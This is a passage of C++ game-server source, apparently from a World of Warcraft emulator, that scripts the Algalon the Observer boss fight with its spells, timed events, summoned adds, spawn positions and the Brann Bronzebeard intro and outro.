EMOTE_ALGALON_BIG_BANG = 8,
SAY_ALGALON_ASCEND = 9,
EMOTE_ALGALON_COSMIC_SMASH = 10,
SAY_ALGALON_PHASE_TWO = 11,
SAY_ALGALON_OUTRO_1 = 12,
SAY_ALGALON_OUTRO_2 = 13,
SAY_ALGALON_OUTRO_3 = 14,
SAY_ALGALON_OUTRO_4 = 15,
SAY_ALGALON_OUTRO_5 = 16,
SAY_ALGALON_DESPAWN_1 = 17,
SAY_ALGALON_DESPAWN_2 = 18,
SAY_ALGALON_DESPAWN_3 = 19,
SAY_ALGALON_KILL = 20,
};
enum Spells
{
// Algalon the Observer
SPELL_ARRIVAL = 64997,
SPELL_RIDE_THE_LIGHTNING = 64986,
SPELL_SUMMON_AZEROTH = 64994,
SPELL_REORIGINATION = 64996,
SPELL_SUPERMASSIVE_FAIL = 65311,
SPELL_QUANTUM_STRIKE = 64395,
SPELL_PHASE_PUNCH = 64412,
SPELL_BIG_BANG = 64443,
SPELL_ASCEND_TO_THE_HEAVENS = 64487,
SPELL_COSMIC_SMASH = 62301,
SPELL_COSMIC_SMASH_TRIGGERED = 62304,
SPELL_COSMIC_SMASH_VISUAL_STATE = 62300,
SPELL_SELF_STUN = 65256,
SPELL_KILL_CREDIT = 65184,
SPELL_TELEPORT = 62940,
// Algalon Stalker
SPELL_TRIGGER_3_ADDS = 62266, // Triggers Living Constellation
// Living Constellation
SPELL_ARCANE_BARRAGE = 64599,
// Collapsing Star
SPELL_COLLAPSE = 62018,
SPELL_BLACK_HOLE_SPAWN_VISUAL = 62003,
SPELL_SUMMON_BLACK_HOLE = 62189,
// Black Hole
SPELL_BLACK_HOLE_TRIGGER = 62185,
SPELL_CONSTELLATION_PHASE_TRIGGER = 65508,
SPELL_CONSTELLATION_PHASE_EFFECT = 65509,
SPELL_BLACK_HOLE_EXPLOSION = 64122,
SPELL_SUMMON_VOID_ZONE_VISUAL = 64470,
SPELL_VOID_ZONE_VISUAL = 64469,
SPELL_BLACK_HOLE_CREDIT = 65312,
// Worm Hole
SPELL_WORM_HOLE_TRIGGER = 65251,
SPELL_SUMMON_UNLEASHED_DARK_MATTER = 64450,
};
uint32 const PhasePunchAlphaId[5] = {64435, 64434, 64428, 64421, 64417};
enum Events
{
// Celestial Planetarium Access
EVENT_DESPAWN_CONSOLE = 1,
// Brann Bronzebeard
EVENT_BRANN_MOVE_INTRO = 2,
EVENT_SUMMON_ALGALON = 3,
EVENT_BRANN_OUTRO_1 = 4,
EVENT_BRANN_OUTRO_2 = 5,
// Algalon the Observer
EVENT_INTRO_1 = 6,
EVENT_INTRO_2 = 7,
EVENT_INTRO_3 = 8,
EVENT_INTRO_FINISH = 9,
EVENT_START_COMBAT = 10,
EVENT_INTRO_TIMER_DONE = 11,
EVENT_QUANTUM_STRIKE = 12,
EVENT_PHASE_PUNCH = 13,
EVENT_SUMMON_COLLAPSING_STAR = 14,
EVENT_BIG_BANG = 15,
EVENT_RESUME_UPDATING = 16,
EVENT_ASCEND_TO_THE_HEAVENS = 17,
EVENT_EVADE = 18,
EVENT_COSMIC_SMASH = 19,
EVENT_UNLOCK_YELL = 20,
EVENT_OUTRO_START = 21,
EVENT_OUTRO_1 = 22,
EVENT_OUTRO_2 = 23,
EVENT_OUTRO_3 = 24,
EVENT_OUTRO_4 = 25,
EVENT_OUTRO_5 = 26,
EVENT_OUTRO_6 = 27,
EVENT_OUTRO_7 = 28,
EVENT_OUTRO_8 = 29,
EVENT_OUTRO_9 = 30,
EVENT_OUTRO_10 = 31,
EVENT_OUTRO_11 = 32,
EVENT_OUTRO_12 = 33,
EVENT_OUTRO_13 = 34,
EVENT_OUTRO_14 = 35,
EVENT_DESPAWN_ALGALON_1 = 36,
EVENT_DESPAWN_ALGALON_2 = 37,
EVENT_DESPAWN_ALGALON_3 = 38,
// Living Constellation
EVENT_ARCANE_BARRAGE = 39,
};
enum Actions
{
ACTION_START_INTRO = 0,
ACTION_FINISH_INTRO = 1,
ACTION_ACTIVATE_STAR = 2,
ACTION_BIG_BANG = 3,
ACTION_ASCEND = 4,
ACTION_OUTRO = 5,
};
enum Points
{
POINT_BRANN_INTRO = 0,
MAX_BRANN_WAYPOINTS_INTRO = 10,
POINT_BRANN_OUTRO = 10,
POINT_BRANN_OUTRO_END = 11,
POINT_ALGALON_LAND = 1,
POINT_ALGALON_OUTRO = 2,
};
enum EncounterPhases
{
PHASE_NORMAL = 0,
PHASE_ROLE_PLAY = 1,
PHASE_BIG_BANG = 2
};
enum AchievmentInfo
{
EVENT_ID_SUPERMASSIVE_START = 21697,
DATA_HAS_FED_ON_TEARS = 30043005,
};
Position const BrannIntroSpawnPos = {1676.277f, -162.5308f, 427.3326f, 3.235537f};
Position const BrannIntroWaypoint[MAX_BRANN_WAYPOINTS_INTRO] =
{
{1642.482f, -164.0812f, 427.2602f, 0.0f},
{1635.000f, -169.5145f, 427.2523f, 0.0f},
{1632.814f, -173.9334f, 427.2621f, 0.0f},
{1632.676f, -190.5927f, 425.8831f, 0.0f},
{1631.497f, -214.2221f, 418.1152f, 0.0f},
{1624.717f, -224.6876f, 418.1152f, 0.0f},
{1631.497f, -214.2221f, 418.1152f, 0.0f},
{1632.676f, -190.5927f, 425.8831f, 0.0f},
{1632.814f, -173.9334f, 427.2621f, 0.0f},
{1635.000f, -169.5145f, 427.2523f, 0.0f},
};
Position const AlgalonSummonPos = {1632.531f, -304.8516f, 450.1123f, 1.530165f};
Position const AlgalonLandPos = {1632.668f, -302.7656f, 417.3211f, 1.530165f};
#define LIVING_CONSTELLATION_COUNT 11
Position const ConstellationPos[LIVING_CONSTELLATION_COUNT] =
{
{1625.208f, -267.2771f, 446.4296f, 5.044002f},
{1658.279f, -262.5490f, 441.9073f, 4.188790f},
{1678.677f, -276.3280f, 427.7531f, 3.979351f},
{1593.389f, -299.4325f, 432.4636f, 6.073746f},
{1685.613f, -300.1219f, 443.2366f, 3.385939f},
{1591.706f, -263.8201f, 441.4153f, 5.253441f},
{1668.317f, -324.7676f, 457.9394f, 3.211406f},
{1592.242f, -325.5323f, 446.9508f, 0.226893f},
{1635.821f, -363.3442f, 424.3459f, 1.466077f},
{1672.188f, -357.2484f, 436.7337f, 2.338741f},
{1615.800f, -348.0065f, 442.9586f, 1.134464f},
};
#define COLLAPSING_STAR_COUNT 4
Position const CollapsingStarPos[COLLAPSING_STAR_COUNT] =
{
{1649.438f, -319.8127f, 418.3941f, 1.082104f},
{1647.005f, -288.6790f, 417.3955f, 3.490659f},
{1622.451f, -321.1563f, 417.6188f, 4.677482f},
{1615.060f, -291.6816f, 417.7796f, 3.490659f},
};
Position const AlgalonOutroPos = {1633.64f, -317.78f, 417.3211f, 0.0f};
Position const BrannOutroPos[3] =
{
{1632.023f, -243.7434f, 417.9118f, 0.0f},
{1631.986f, -297.7831f, 417.3210f, 0.0f},
{1633.832f, -216.2948f, 417.0463f, 0.0f},
};
class ActivateLivingConstellation : public BasicEvent
{
public:
ActivateLivingConstellation(Unit* owner) : _owner(owner), _instance(owner->GetInstanceScript())
{
}
bool Execute(uint64 execTime, uint32 /*diff*/) override
{
if (!_instance || _instance->GetBossState(BOSS_ALGALON) != IN_PROGRESS)
return true; // delete event
_owner->CastSpell(nullptr, SPELL_TRIGGER_3_ADDS, TRIGGERED_FULL_MASK);
_owner->m_Events.AddEvent(this, execTime + urand(45000, 50000));
return false;
}
private:
Unit* _owner;
InstanceScript* _instance;
};
class CosmicSmashDamageEvent : public BasicEvent
{
public:
CosmicSmashDamageEvent(Unit* caster) : _caster(caster)
{
}
bool Execute(uint64 /*execTime*/, uint32 /*diff*/) override
{
_caster->CastSpell(nullptr, SPELL_COSMIC_SMASH_TRIGGERED, TRIGGERED_FULL_MASK);
return true;
}
private:
Unit* _caster;
};
class SummonUnleashedDarkMatter : public BasicEvent
{
public:
SummonUnleashedDarkMatter(Unit* caster) : _caster(caster)
{
}
bool Execute(uint64 execTime, uint32 /*diff*/) override
{
_caster->CastSpell(nullptr, SPELL_SUMMON_UNLEASHED_DARK_MATTER, TRIGGERED_FULL_MASK);
_caster->m_Events.AddEvent(this, execTime + 30000);
return false;
}
private:
Unit* _caster;
};
class boss_algalon_the_observer : public CreatureScript
{
public:
boss_algalon_the_observer() : CreatureScript("boss_algalon_the_observer") { }
struct boss_algalon_the_observerAI : public BossAI
{
boss_algalon_the_observerAI(Creature* creature) : BossAI(creature, BOSS_ALGALON)
{
Initialize();
_firstPull = true;
_fedOnTears = false;
}
void Initialize()
{
_phaseTwo = false;
_fightWon = false;
_hasYelled = false;
}
void Reset() override
{
_Reset();
me->SetReactState(REACT_PASSIVE);
Initialize();
}
void KilledUnit(Unit* victim) override
{
if (victim->GetTypeId() == TYPEID_PLAYER)
{
_fedOnTears = true;
if (!_hasYelled)
{
_hasYelled = true;
events.ScheduleEvent(EVENT_UNLOCK_YELL, 1000);
Talk(SAY_ALGALON_KILL);
}
}
}
void DoAction(int32 action) override
{
switch (action)
{
case ACTION_START_INTRO:
{
me->SetFlag(UNIT_FIELD_FLAGS_2, UNIT_FLAG2_INSTANTLY_APPEAR_MODEL);
me->SetDisableGravity(true);
DoCast(me, SPELL_ARRIVAL, true);
DoCast(me, SPELL_RIDE_THE_LIGHTNING, true);
me->GetMotionMaster()->MovePoint(POINT_ALGALON_LAND, AlgalonLandPos);
me->SetHomePosition(AlgalonLandPos);
Movement::MoveSplineInit init(me);
init.MoveTo(AlgalonLandPos.GetPositionX(), AlgalonLandPos.GetPositionY(), AlgalonLandPos.GetPositionZ(), false);
init.SetOrientationFixed(true);
init.Launch();
events.Reset();
events.SetPhase(PHASE_ROLE_PLAY);
events.ScheduleEvent(EVENT_INTRO_1, 5000, 0, PHASE_ROLE_PLAY);
events.ScheduleEvent(EVENT_INTRO_2, 15000, 0, PHASE_ROLE_PLAY);
events.ScheduleEvent(EVENT_INTRO_3, 23000, 0, PHASE_ROLE_PLAY);
events.ScheduleEvent(EVENT_INTRO_FINISH, 36000, 0, PHASE_ROLE_PLAY);
break;
}
case ACTION_ASCEND:
events.SetPhase(PHASE_BIG_BANG);
events.CancelEvent(EVENT_RESUME_UPDATING);
events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 1500);
break;
case EVENT_DESPAWN_ALGALON:
events.Reset();
events.SetPhase(PHASE_ROLE_PLAY);
if (me->IsInCombat())
events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 1);
events.ScheduleEvent(EVENT_DESPAWN_ALGALON_1, 5000);
events.ScheduleEvent(EVENT_DESPAWN_ALGALON_2, 17000);
events.ScheduleEvent(EVENT_DESPAWN_ALGALON_3, 26000);
me->DespawnOrUnsummon(34000);
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->SetImmuneToNPC(true);
break;
case ACTION_INIT_ALGALON:
_firstPull = false;
me->SetImmuneToPC(false);
break;
}
}
uint32 GetData(uint32 type) const override
{
return type == DATA_HAS_FED_ON_TEARS ? _fedOnTears : 1;
}
void EnterCombat(Unit* /*target*/) override
{
uint32 introDelay = 0;
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->SetImmuneToNPC(true);
events.Reset();
events.SetPhase(PHASE_ROLE_PLAY);
if (!_firstPull)
{
Talk(SAY_ALGALON_AGGRO);
_EnterCombat();
introDelay = 8000;
}
else
{
_firstPull = false;
Talk(SAY_ALGALON_START_TIMER);
if (Creature* brann = instance->GetCreature(DATA_BRANN_BRONZEBEARD_ALG))
brann->AI()->DoAction(ACTION_FINISH_INTRO);
me->setActive(true);
DoZoneInCombat();
introDelay = 26000;
summons.DespawnEntry(NPC_AZEROTH);
instance->SetData(EVENT_DESPAWN_ALGALON, 0);
events.ScheduleEvent(EVENT_START_COMBAT, 18000);
}
events.ScheduleEvent(EVENT_INTRO_TIMER_DONE, introDelay);
events.ScheduleEvent(EVENT_QUANTUM_STRIKE, 3500 + introDelay);
events.ScheduleEvent(EVENT_PHASE_PUNCH, 15500 + introDelay);
events.ScheduleEvent(EVENT_SUMMON_COLLAPSING_STAR, 18000 + introDelay);
events.ScheduleEvent(EVENT_BIG_BANG, 90000 + introDelay);
events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 360000 + introDelay);
events.ScheduleEvent(EVENT_COSMIC_SMASH, 25000 + introDelay);
std::list<Creature*> stalkers;
me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
for (std::list<Creature*>::iterator itr = stalkers.begin(); itr != stalkers.end(); ++itr)
(*itr)->m_Events.KillAllEvents(true);
}
void MovementInform(uint32 movementType, uint32 pointId) override
{
if (movementType != POINT_MOTION_TYPE)
return;
if (pointId == POINT_ALGALON_LAND)
me->SetDisableGravity(false);
else if (pointId == POINT_ALGALON_OUTRO)
{
me->SetFacingTo(1.605703f);
events.ScheduleEvent(EVENT_OUTRO_3, 1200);
events.ScheduleEvent(EVENT_OUTRO_4, 2400);
events.ScheduleEvent(EVENT_OUTRO_5, 8500);
events.ScheduleEvent(EVENT_OUTRO_6, 15500);
events.ScheduleEvent(EVENT_OUTRO_7, 55500);
events.ScheduleEvent(EVENT_OUTRO_8, 73500);
events.ScheduleEvent(EVENT_OUTRO_9, 85500);
events.ScheduleEvent(EVENT_OUTRO_10, 108500);
events.ScheduleEvent(EVENT_OUTRO_11, 123500);
}
}
void JustSummoned(Creature* summon) override
{
summons.Summon(summon);
switch (summon->GetEntry())
{
case NPC_AZEROTH:
DoCastAOE(SPELL_REORIGINATION, true);
break;
case NPC_COLLAPSING_STAR:
summon->SetReactState(REACT_PASSIVE);
summon->GetMotionMaster()->MoveRandom(20.0f);
summon->CastSpell(summon, SPELL_COLLAPSE, TRIGGERED_FULL_MASK);
break;
case NPC_BLACK_HOLE:
summon->SetReactState(REACT_PASSIVE);
summon->CastSpell(nullptr, SPELL_BLACK_HOLE_TRIGGER, TRIGGERED_FULL_MASK);
summon->CastSpell(summon, SPELL_CONSTELLATION_PHASE_TRIGGER, TRIGGERED_FULL_MASK);
summon->CastSpell(nullptr, SPELL_BLACK_HOLE_EXPLOSION);
summon->CastSpell(summon, SPELL_SUMMON_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
break;
case NPC_ALGALON_VOID_ZONE_VISUAL_STALKER:
summon->CastSpell(summon, SPELL_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
break;
case NPC_ALGALON_STALKER_ASTEROID_TARGET_01:
summon->CastSpell(summon, SPELL_COSMIC_SMASH_VISUAL_STATE, TRIGGERED_FULL_MASK);
break;
case NPC_ALGALON_STALKER_ASTEROID_TARGET_02:
summon->m_Events.AddEvent(new CosmicSmashDamageEvent(summon), summon->m_Events.CalculateTime(3250));
break;
case NPC_WORM_HOLE:
summon->SetReactState(REACT_PASSIVE);
summon->CastSpell(summon, SPELL_WORM_HOLE_TRIGGER, TRIGGERED_FULL_MASK);
summon->CastSpell(summon, SPELL_SUMMON_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
break;
case NPC_UNLEASHED_DARK_MATTER:
if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0, NonTankTargetSelector(me)))
if (summon->Attack(target, true))
summon->GetMotionMaster()->MoveChase(target);
break;
}
}
void EnterEvadeMode(EvadeReason why) override
{
instance->SetBossState(BOSS_ALGALON, FAIL);
BossAI::EnterEvadeMode(why);
me->SetImmuneToPC(false);
me->SetSheath(SHEATH_STATE_UNARMED);
}
void DamageTaken(Unit* /*attacker*/, uint32& damage) override
{
if (_fightWon)
{
damage = 0;
return;
}
if (!_phaseTwo && me->HealthBelowPctDamaged(20, damage))
{
_phaseTwo = true;
Talk(SAY_ALGALON_PHASE_TWO);
summons.DespawnEntry(NPC_LIVING_CONSTELLATION);
summons.DespawnEntry(NPC_COLLAPSING_STAR);
summons.DespawnEntry(NPC_BLACK_HOLE);
summons.DespawnEntry(NPC_ALGALON_VOID_ZONE_VISUAL_STALKER);
events.CancelEvent(EVENT_SUMMON_COLLAPSING_STAR);
std::list<Creature*> stalkers;
me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
for (std::list<Creature*>::iterator itr = stalkers.begin(); itr != stalkers.end(); ++itr)
(*itr)->m_Events.KillAllEvents(true);
for (uint32 i = 0; i < COLLAPSING_STAR_COUNT; ++i)
if (Creature* wormHole = DoSummon(NPC_WORM_HOLE, CollapsingStarPos[i], TEMPSUMMON_MANUAL_DESPAWN))
wormHole->m_Events.AddEvent(new SummonUnleashedDarkMatter(wormHole), wormHole->m_Events.CalculateTime(i >= 2 ? 8000 : 6000));
}
else if ((int32(me->GetHealth()) - int32(damage)) < CalculatePct<int32>(int32(me->GetMaxHealth()), 2.5f) && !_fightWon)
{
_fightWon = true;
damage = 0;
me->SetReactState(REACT_PASSIVE);
me->AttackStop();
me->SetFaction(FACTION_FRIENDLY);
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
DoCast(me, SPELL_SELF_STUN);
events.Reset();
summons.DespawnAll();
events.SetPhase(PHASE_ROLE_PLAY);
events.ScheduleEvent(EVENT_OUTRO_START, 1500);
events.ScheduleEvent(EVENT_OUTRO_1, 7200);
events.ScheduleEvent(EVENT_OUTRO_2, 8700);
}
}
void UpdateAI(uint32 diff) override
{
if (!(events.IsInPhase(PHASE_ROLE_PLAY) || events.IsInPhase(PHASE_BIG_BANG)) && !UpdateVictim())
return;
events.Update(diff);
if (!events.IsInPhase(PHASE_ROLE_PLAY))
if (me->HasUnitState(UNIT_STATE_CASTING))
return;
while (uint32 eventId = events.ExecuteEvent())
{
switch (eventId)
{
case EVENT_INTRO_1:
me->RemoveAurasDueToSpell(SPELL_RIDE_THE_LIGHTNING);
Talk(SAY_ALGALON_INTRO_1);
break;
case EVENT_INTRO_2:
DoCastAOE(SPELL_SUMMON_AZEROTH, true);
Talk(SAY_ALGALON_INTRO_2);
break;
case EVENT_INTRO_3:
Talk(SAY_ALGALON_INTRO_3);
break;
case EVENT_INTRO_FINISH:
events.Reset();
me->SetImmuneToPC(false);
break;
case EVENT_START_COMBAT:
instance->SetBossState(BOSS_ALGALON, IN_PROGRESS);
break;
case EVENT_INTRO_TIMER_DONE:
{
events.SetPhase(PHASE_NORMAL);
me->SetSheath(SHEATH_STATE_MELEE);
me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->SetImmuneToNPC(false);
me->SetReactState(REACT_DEFENSIVE);
DoCastAOE(SPELL_SUPERMASSIVE_FAIL, true);
//! Workaround for Creature::_IsTargetAcceptable returning false
//! for creatures that start combat in REACT_PASSIVE and UNIT_FLAG_NOT_SELECTABLE
//! causing them to immediately evade
if (!me->GetThreatManager().IsThreatListEmpty())
AttackStart(me->GetThreatManager().SelectVictim());
for (uint32 i = 0; i < LIVING_CONSTELLATION_COUNT; ++i)
if (Creature* summon = DoSummon(NPC_LIVING_CONSTELLATION, ConstellationPos[i], 0, TEMPSUMMON_DEAD_DESPAWN))
summon->SetReactState(REACT_PASSIVE);
std::list<Creature*> stalkers;
me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
if (!stalkers.empty())
{
Unit* stalker = Trinity::Containers::SelectRandomContainerElement(stalkers);
stalker->m_Events.AddEvent(new ActivateLivingConstellation(stalker), stalker->m_Events.CalculateTime(urand(45000, 50000)));
}
break;
}
case EVENT_QUANTUM_STRIKE:
DoCastVictim(SPELL_QUANTUM_STRIKE);
events.ScheduleEvent(EVENT_QUANTUM_STRIKE, urand(3000, 5000));
break;
case EVENT_PHASE_PUNCH:
DoCastVictim(SPELL_PHASE_PUNCH);
events.ScheduleEvent(EVENT_PHASE_PUNCH, 15500);
break;
case EVENT_SUMMON_COLLAPSING_STAR:
Talk(SAY_ALGALON_COLLAPSING_STAR);
Talk(EMOTE_ALGALON_COLLAPSING_STAR);
for (uint32 i = 0; i < COLLAPSING_STAR_COUNT; ++i)
me->SummonCreature(NPC_COLLAPSING_STAR, CollapsingStarPos[i], TEMPSUMMON_CORPSE_DESPAWN);
events.ScheduleEvent(EVENT_SUMMON_COLLAPSING_STAR, 60000);
break;
case EVENT_BIG_BANG:
{
Talk(SAY_ALGALON_BIG_BANG);
Talk(EMOTE_ALGALON_BIG_BANG);
events.SetPhase(PHASE_BIG_BANG);
std::list<Creature*> constellations;
me->GetCreatureListWithEntryInGrid(constellations, NPC_LIVING_CONSTELLATION, 200.0f);
for (std::list<Creature*>::iterator itr = constellations.begin(); itr != constellations.end(); ++itr)
(*itr)->AI()->DoAction(ACTION_BIG_BANG);
DoCastAOE(SPELL_BIG_BANG);
events.ScheduleEvent(EVENT_BIG_BANG, 90500);
events.ScheduleEvent(EVENT_RESUME_UPDATING, 9500);
break;
}
case EVENT_RESUME_UPDATING:
events.SetPhase(0);
break;
case EVENT_ASCEND_TO_THE_HEAVENS:
Talk(SAY_ALGALON_ASCEND);
DoCastAOE(SPELL_ASCEND_TO_THE_HEAVENS);
events.ScheduleEvent(EVENT_EVADE, 2500);
break;
case EVENT_EVADE:
EnterEvadeMode(EVADE_REASON_OTHER);
break;
case EVENT_COSMIC_SMASH:
Talk(EMOTE_ALGALON_COSMIC_SMASH);
DoCastAOE(SPELL_COSMIC_SMASH);
events.ScheduleEvent(EVENT_COSMIC_SMASH, 25500);
break;
case EVENT_UNLOCK_YELL:
_hasYelled = false;
break;
case EVENT_OUTRO_START:
instance->SetBossState(BOSS_ALGALON, DONE);
break;
case EVENT_OUTRO_1:
me->RemoveAllAuras();
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_RENAME);
break;
case EVENT_OUTRO_2:
_EnterEvadeMode();
me->GetMotionMaster()->MovePoint(POINT_ALGALON_OUTRO, AlgalonOutroPos);
break;
case EVENT_OUTRO_3:
DoCastAOE(SPELL_KILL_CREDIT);
break;
case EVENT_OUTRO_4:
DoCastAOE(SPELL_SUPERMASSIVE_FAIL);
me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
break;
case EVENT_OUTRO_5:
if (Creature* brann = DoSummon(NPC_BRANN_BRONZBEARD_ALG, BrannOutroPos[0], 131500, TEMPSUMMON_TIMED_DESPAWN))
brann->AI()->DoAction(ACTION_OUTRO);
break;
case EVENT_OUTRO_6:
Talk(SAY_ALGALON_OUTRO_1);
me->SetStandState(UNIT_STAND_STATE_KNEEL);
break;
case EVENT_OUTRO_7:
Talk(SAY_ALGALON_OUTRO_2);
break;
case EVENT_OUTRO_8:
Talk(SAY_ALGALON_OUTRO_3);
break;
case EVENT_OUTRO_9:
Talk(SAY_ALGALON_OUTRO_4);
break;
case EVENT_OUTRO_10:
Talk(SAY_ALGALON_OUTRO_5);
break;
case EVENT_OUTRO_11:
me->SetStandState(UNIT_STAND_STATE_STAND);
DoCast(me, SPELL_TELEPORT);
me->DespawnOrUnsummon(1500);
break;
}
if (me->HasUnitState(UNIT_STATE_CASTING) && !events.IsInPhase(PHASE_ROLE_PLAY))
return;
}
DoMeleeAttackIfReady();
}
private:
bool _firstPull;
bool _fedOnTears;
bool _phaseTwo;
bool _fightWon;
bool _hasYelled;
};
CreatureAI* GetAI(Creature* creature) const override
{
return GetUlduarAI<boss_algalon_the_observerAI>(creature);
}
};
class npc_living_constellation : public CreatureScript
{
public:
npc_living_constellation() : CreatureScript("npc_living_constellation") { }
struct npc_living_constellationAI : public CreatureAI
{
npc_living_constellationAI(Creature* creature) : CreatureAI(creature)
{
Initialize();
}
void Initialize()
{
_isActive = false;
}
void Reset() override
{
_events.Reset();
_events.ScheduleEvent(EVENT_ARCANE_BARRAGE, 2500);
Initialize();
}
uint32 GetData(uint32 /*type*/) const override
{
return _isActive ? 1 : 0;
}
void DoAction(int32 action) override
{
switch (action)
{
case ACTION_ACTIVATE_STAR:
if (Creature* algalon = me->FindNearestCreature(NPC_ALGALON, 200.0f))
{
if (Unit* target = algalon->AI()->SelectTarget(SELECT_TARGET_RANDOM, 0, NonTankTargetSelector(algalon)))
{
me->SetReactState(REACT_AGGRESSIVE);
me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
AttackStart(target);
DoZoneInCombat();
_isActive = true;
}
}
break;
case ACTION_BIG_BANG:
_events.SetPhase(PHASE_BIG_BANG);
_events.DelayEvents(9500);
_events.ScheduleEvent(EVENT_RESUME_UPDATING, 9500);
break;
}
}
void SpellHit(Unit* caster, SpellInfo const* spell) override
{
if (spell->Id != SPELL_CONSTELLATION_PHASE_EFFECT || caster->GetTypeId() != TYPEID_UNIT)
return;
me->DespawnOrUnsummon(1);
if (InstanceScript* instance = me->GetInstanceScript())
instance->DoStartTimedAchievement(ACHIEVEMENT_TIMED_TYPE_EVENT, EVENT_ID_SUPERMASSIVE_START);
caster->CastSpell(nullptr, SPELL_BLACK_HOLE_CREDIT, TRIGGERED_FULL_MASK);
caster->ToCreature()->DespawnOrUnsummon(1);
}
void UpdateAI(uint32 diff) override
{
if (!(_events.IsInPhase(PHASE_ROLE_PLAY) || _events.IsInPhase(PHASE_BIG_BANG)) && !UpdateVictim())
return;
_events.Update(diff);
while (uint32 eventId = _events.ExecuteEvent())
{
switch (eventId)
{
case EVENT_ARCANE_BARRAGE:
DoCastAOE(SPELL_ARCANE_BARRAGE);
_events.ScheduleEvent(EVENT_ARCANE_BARRAGE, 2500);
break;
case EVENT_RESUME_UPDATING:
_events.SetPhase(0);
break;
}
}
}
private:
EventMap _events;
bool _isActive;
};
CreatureAI* GetAI(Creature* creature) const override
{
return GetUlduarAI<npc_living_constellationAI>(creature);
}
};
class npc_collapsing_star : public CreatureScript
{
public:
npc_collapsing_star() : CreatureScript("npc_collapsing_star") { }
struct npc_collapsing_starAI : public PassiveAI
{
npc_collapsing_starAI(Creature* creature) : PassiveAI(creature)
{
_dying = false;
}
void JustSummoned(Creature* summon) override
{
if (summon->GetEntry() != NPC_BLACK_HOLE)
return;
if (TempSummon* summ = me->ToTempSummon())
if (Creature* algalon = ObjectAccessor::GetCreature(*me, summ->GetSummonerGUID()))
algalon->AI()->JustSummoned(summon);
me->DespawnOrUnsummon(1);
}
void DamageTaken(Unit* /*attacker*/, uint32& damage) override
{
if (_dying)
{
damage = 0;
return;
}
if (damage >= me->GetHealth())
{
_dying = true;
damage = 0;
DoCast(me, SPELL_BLACK_HOLE_SPAWN_VISUAL, true);
DoCast(me, SPELL_SUMMON_BLACK_HOLE, true);
}
}
bool _dying;
};
CreatureAI* GetAI(Creature* creature) const override
{
return GetUlduarAI<npc_collapsing_starAI>(creature);
}
};
class npc_brann_bronzebeard_algalon : public CreatureScript
{
public:
npc_brann_bronzebeard_algalon() : CreatureScript("npc_brann_bronzebeard_algalon") { }
struct npc_brann_bronzebeard_algalonAI : public CreatureAI
{
npc_brann_bronzebeard_algalonAI(Creature* creature) : CreatureAI(creature)
{
_currentPoint = 0;
}
void DoAction(int32 action) override
{
switch (action)
{
case ACTION_START_INTRO:
_currentPoint = 0;
_events.Reset();
me->SetWalk(false);
_events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, 1);
break;
case ACTION_FINISH_INTRO:
Talk(SAY_BRANN_ALGALON_INTRO_2);
_events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, 1);
break;
case ACTION_OUTRO:
me->GetMotionMaster()->MovePoint(POINT_BRANN_OUTRO, BrannOutroPos[1]);
_events.ScheduleEvent(EVENT_BRANN_OUTRO_1, 89500);
_events.ScheduleEvent(EVENT_BRANN_OUTRO_2, 116500);
break;
}
}
void MovementInform(uint32 movementType, uint32 pointId) override
{
if (movementType != POINT_MOTION_TYPE)
return;
uint32 delay = 1;
_currentPoint = pointId + 1;
switch (pointId)
{
case 2:
delay = 8000;
me->SetWalk(true);
break;
case 5:
me->SetWalk(false);
Talk(SAY_BRANN_ALGALON_INTRO_1);
_events.ScheduleEvent(EVENT_SUMMON_ALGALON, 7500);
return;
case 9:
me->DespawnOrUnsummon(1);
return;
case POINT_BRANN_OUTRO:
case POINT_BRANN_OUTRO_END:
return;
}
_events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, delay);
}
void UpdateAI(uint32 diff) override
{
UpdateVictim();
if (_events.Empty())
return;
_events.Update(diff);
while (uint32 eventId = _events.ExecuteEvent())
{
switch (eventId)
{
case EVENT_BRANN_MOVE_INTRO:
if (_currentPoint < MAX_BRANN_WAYPOINTS_INTRO)
me->GetMotionMaster()->MovePoint(_currentPoint, BrannIntroWaypoint[_currentPoint]);
break;
case EVENT_SUMMON_ALGALON:
if (Creature* algalon = me->GetMap()->SummonCreature(NPC_ALGALON, AlgalonSummonPos))
algalon->AI()->DoAction(ACTION_START_INTRO);
break;
case EVENT_BRANN_OUTRO_1:
Talk(SAY_BRANN_ALGALON_OUTRO);
break;
case EVENT_BRANN_OUTRO_2:
me->GetMotionMaster()->MovePoint(POINT_BRANN_OUTRO_END, BrannOutroPos[2]);
break;
}
}
}
private:
EventMap _events;
uint32 _currentPoint;
};
CreatureAI* GetAI(Creature* creature) const override
{
return GetUlduarAI<npc_brann_bronzebeard_algalonAI>(creature);
}
};
class go_celestial_planetarium_access : public GameObjectScript
{
public:
go_celestial_planetarium_access() : GameObjectScript("go_celestial_planetarium_access") { }
struct go_celestial_planetarium_accessAI : public GameObjectAI
{
go_celestial_planetarium_accessAI(GameObject* go) : GameObjectAI(go), instance(go->GetInstanceScript()) { }
InstanceScript* instance;
bool GossipHello(Player* player) override
{
if (me->HasFlag(GAMEOBJECT_FLAGS, GO_FLAG_IN_USE))
return true;
bool hasKey = true;
